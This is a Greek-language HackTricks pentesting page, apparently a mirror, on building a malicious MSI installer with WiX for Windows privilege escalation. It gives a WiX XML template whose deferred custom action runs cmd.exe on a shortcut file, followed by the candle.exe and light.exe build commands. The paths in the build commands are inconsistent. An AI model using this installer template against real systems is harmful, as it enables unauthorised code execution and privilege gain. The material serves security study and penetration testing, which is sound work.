Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

7.9 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Δημιουργία Κακόβουλου MSI και Απόκτηση Root

Η δημιουργία του εγκαταστάτη MSI θα γίνει χρησιμοποιώντας το wixtools, συγκεκριμένα θα χρησιμοποιηθεί το wixtools. Αξίζει να αναφερθεί ότι δοκιμάστηκαν εναλλακτικοί δημιουργοί MSI, αλλά δεν είχαν επιτυχία σε αυτήν την συγκεκριμένη περίπτωση.

Για μια κατανόηση των παραδειγμάτων χρήσης του wix MSI, συνιστάται να ανατρέξετε σε αυτήν τη σελίδα. Εδώ μπορείτε να βρείτε διάφορα παραδείγματα που δείχνουν τη χρήση του wix MSI.

Ο στόχος είναι να δημιουργηθεί ένα MSI που θα εκτελεί το αρχείο lnk. Για να επιτευχθεί αυτό, μπορεί να χρησιμοποιηθεί ο παρακάτω κώδικας XML (xml από εδώ):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Είναι σημαντικό να σημειωθεί ότι το στοιχείο Package περιέχει γνωρίσματα όπως το InstallerVersion και το Compressed, που καθορίζουν την έκδοση του εγκαταστάτη και υποδηλώνουν εάν το πακέτο είναι συμπιεσμένο ή όχι, αντίστοιχα.

Ο διαδικασία δημιουργίας περιλαμβάνει τη χρήση του εργαλείου candle.exe από το wixtools, για τη δημιουργία ενός αντικειμένου wix από το msi.xml. Πρέπει να εκτελεστεί η παρακάτω εντολή:

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

Επιπλέον, αξίζει να αναφερθεί ότι παρέχεται μια εικόνα στην ανάρτηση, η οποία απεικονίζει την εντολή και την έξοδό της. Μπορείτε να ανατρέξετε σε αυτήν για οπτική καθοδήγηση.

Επιπλέον, το light.exe, ένα άλλο εργαλείο από τα wixtools, θα χρησιμοποιηθεί για τη δημιουργία του αρχείου MSI από το wixobject. Η εντολή που πρέπει να εκτελεστεί είναι η εξής:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

Παρόμοια με την προηγούμενη εντολή, περιλαμβάνεται μια εικόνα στην ανάρτηση που επεξηγεί την εντολή και την έξοδό της.

Παρακαλούμε να σημειωθεί ότι, ενώ αυτή η περίληψη αποσκοπεί να παρέχει χρήσιμες πληροφορίες, συνιστάται να ανατρέξετε στην αρχική ανάρτηση για πιο λεπτομερείς πληροφορίες και ακριβείς οδηγίες.

Αναφορές

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: